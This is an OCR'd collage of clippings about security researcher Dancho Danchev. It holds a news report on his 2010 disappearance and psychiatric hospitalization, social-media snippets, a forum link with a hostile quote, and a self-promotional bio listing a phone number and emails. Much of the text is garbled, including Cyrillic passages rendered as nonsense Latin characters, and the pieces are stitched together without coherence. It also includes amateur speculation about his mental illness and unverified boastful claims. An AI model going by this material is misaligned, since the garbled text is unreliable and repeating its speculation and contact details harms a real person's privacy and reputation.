Eastern bloc baddies who are making money off of botnets and malware that Dancho was revealing in his 
ZDnet blog and his blogspot. He perhaps hit a little too close to home for someone and they just made a call 
to the state security apparatus. Or, maybe in fact, he has begun to manifest symptoms of schizoid behavior, 
he is after all, in the right age range to do so. However, given a read through his writings online, | cannot at 
present see anything that leads me to believe that he is manifesting a mental illness here. His postings are 
cogent and have none of the aphasia characteristics that would lead anyone to believe he is ill. 
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Contributed By. = An article on Bulgarian news website "Dnevnik" reports that security researcher Dancho 
Headlines Danchev was placed in a mental hospital in early December of last year. 


Danchev, an information security researcher and author, was reported as missing since late 
summer 2010, according to an article in New Zealand based ZDNet. 


Danchev was thought to have disappeared under mysterious circumstances after an unnamed source revealed they 
had received a letter in September of 2010 in which Danchev outlined concerns that he may be under surveillance 
from the Bulgarian government and could face prosecution. 


Circumstances surrounding Danchev's apparent admission to a mental hospital are unclear, but a rough translation 
of the Dnevnik article on Dachev's institutionalization is as follows: 


Dancho Danchev, an expert on cybersecurity, is accommodated in a Bulgarian hospital. The information was 
confirmed by two sources of "Diary", although from the hospital refused comment. 


As Wired magazine announced a few days ago, he disappeared in September 2010 and did not meet their 
coordinates. Twenty-six year old Dancho Danchev writes for the blog Zero Day, part of the news site zdnet.com. His 
last post there is from August 2010 


In early September, sent an e-mail to the editors of zdnet.com , informing them that the bathroom he installed 
listening devices. in addition, attached photos of the electric transformer and torn wires on the bulbs. In his letter 
Dancho Danchev said that the Bulgarian intelligence services monitor it because it was recommended by the FBI 
Attaché in Sofia for an expert in the local center against computer threats. 


Then keep track of Dancho Danchev disappear, but according to reliable source of "Diary" he hospitalized from 
December 11 onwards. It is now stabilized and will soon be discharged, our source said. 


Expect more details 


“Dancho’ss alive but he’s in a Jot of trouble," the source was quoted as saying. 


Dancho Danchev is is highly reputable malware researcher and blogger who has made significant contributions to 
the information security field. 
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ut 


24th of November 


ashiyane Brno «fA 
Facepook © 


Nima Salehi 


@ 


nima.salehi@yahoo.com 
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Shadowserver is influenced by: certbund, BSI_Presse, CERT_at, botherder 

Shadowserver is influencing: securityfreax, dvk@iuk, BattIefists, TeMerc, certbund 
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OperationLeakS is influenci quinnnt856, TheNiceBot, CopRecordings, zwa3049, whatsinanameyou 
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C Cryptome i 
@Cryptome_ 

Featured at RSA Europe, CyberCamp, InfoSec, GCHQ and 

Interpol Dancho Danchev continues to actively produce threat 

intelligence at the industry's leading threat intelligence blog. 

Archive: 

archive.org/download/danch... 

@cryptome_org 
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05:37 

https://t.co/JIcqOaYgET CC: @briankrebs https://t.co/laHfOQU7ch 
Cocuyn fanyo fanyes. UW OH COCHET NO uTory. 

Y MeHA-TO STO He xob6bu. 

Xynu mHe Gonteca-To? Hexorga, pabotaem. 
maza.cc:555/showthread.php?t=43108 

; 551807916 
sal@jabber.sg 

Dancho Danchev sucked it and he will eventually suck it too. 
I’m not doing this as my hobby. 

you think I’m afraid of anything? I have no time to be afraid. 
I’m working. 
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05:39 


Russian OSINT ~a 


VUnTepebto c OSINT cneumannctom flaHyo 
Jianyeespiom. He Ha BCe BONPOCbI yAaNnocb 
NONYYUTb pasBepHyTbie OTBETHI, HO B 
UeNOM NOCbIN NOHATeH. Ku6epKpalim 
nporpeccupyer, ransomware raBHbit 
TpeHA 2021 roa, a CLUA no-npexHemy 
HaXOAMTCA B KOHTpax C Poccuen. 
Cogep>kaHve HHTepBbWo: 


= Kto taxon Jlanyuo? 

= “em OH 3HAMeHMT? 

> Pa6ota Ha U.S Law Enforcement u U.S 
Intelligence Community 

> OSINT onepauna “Uncle George” 

= Cybercrime Forum Data Set Ha 16 [6 
> Ransomware u Darkweb 

> Mpw6vinb REvil 

= “Poccua OCTaeTCA fnaBHbiM 
paccaguuKom KH6epnpectynHocTH” 

> Ku6éepnpectynxHocTb B CHT 


https://telegra.ph/Intervyu-s-hakerom- 
Dancho-Danchev-04-12 


Telegraph 

VUnteppow c Gonrapckum xakepom 
Alanvo Januesbim cneunanbHo 
ana Russian OSINT: Ku6epxpaim B 
2021 

Vima: flanyo flaxyes / Dancho Danchev Pog 
3aHATHa: VB uccnegosarenb, OSINT 
cneuvanucr Cneynannsayna: Ku6epKpaiim, 
Darknet && OSINT Crpana: Bonrapua Car: 
ddanchev.blogspot.com Twitter: 
https://twitter.com/dancho_danchev Russian 
OSINT: Dano, pacckaxxv HEMHOTO.... 
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14:29 89 & © + Mot ae 
€- _—_ Q Dancho Danchev Pe 


Dancho Danchev is the world’s leading expert in the field of 
cybercrime fighting and threat intelligence gathering having 
actively pioneered his own methodology for processing 
threat intelligence leading to a successful set of hundreds 
of high-quality analysis and research articles published at 
the industry's leading threat intelligence blog - ZDNet's Zero 
Day, Dancho Danchev's Mind Streams of Information Security 
Knowledge and Webroot's Threat Blog with his research 
featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine, 
TheRegister, NYTimes, CNET, ComputerWorld, H+Magazine 
currently producing threat intelligence at the industry's 
leading threat intelligence blog - Dancho Danchev's - Mind 
Streams of Information Security Knowledge which has 
received over 5.6M page views since December, 2005 and 
is currently considered one of the security industry's most 
popular security publications. 


- Presented at the GCHQ with the Honeynet Project 

- SCMagazine Who to Follow on Twitter for 2011 

- Participated in a Top Secret GCHQ Program called “Lovely 
Horse” 

- Identified a major victim of the SolarWinds Attack - 
PaloAltoNetworks 

- Found malware on the Web Site of Flashpoint 

- Tracked monitored and profiled the Koobface Botnet and 
exposed one botnet operator 

- Made it to Slashdot two times 

- My Personal Blog got 5.6M Page Views Since December, 
2005 


- My old Twitter Account got 11,000 followers 

- Thad an average of 7,000 RSS readers on my blog 

- [have my own vinyl “Blue Sabbath Black Cheer / Griefer - 
We Hate You / Dancho Danchev Suck My Dick” made by a 
Canadian artist 

- Currently running Astalavista, box.sk 

- I gave an interview to DW on the Koobface Botnet 

- | gave an interview to NYTimes on the Koobface botnet 

- | gave an interview to Russian OSINT 

- Listed as a major competitor by Jeffrey Carr's Taia Global 
- Presented at the GCHQ 

- Presented at Interpol 

- Presented at InfoSec 

- Presented at CyberCamp 

- Presented at RSA Europe 


He's currently running a high-profile hacking and s 
project on the original https://astalavista.box.sk an 
reached at dancho.danchev@hush.com 
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Manyo flanyes 

ddanchev.blogspot.com 

Tou e MO>Ke 6U HaW-BNUATENHUAT 
6bNrapcKku 6Norbp B CBeETOBeH MaLaé - 
TeEXHUYeCKH eKCNepT B O6NacTTa Ha 
Ku6epcurypHocttTa. 
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ABOUTUS 


Dancho Danchev is an internationally recognized 
cybercrime researcher security blogger OSINT analyst and 
threat intelligence analyst that's currently running one of 
the security industry's most popular security publications 
his personal blog - https: //ddanchev blogspot.com since 
December, 2005 which has received approximately 56M 
page views since its original start 
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REACH US 


+359876893890 
Email: dancho.danchev@hush.com 


https; //ddanchev.blogspot.com 
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Scanning Files Statistics in Last 24 Hours 
Device(s) 
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Dancho Danchev's Blog - Mind Streams of Information Security Knowledge 
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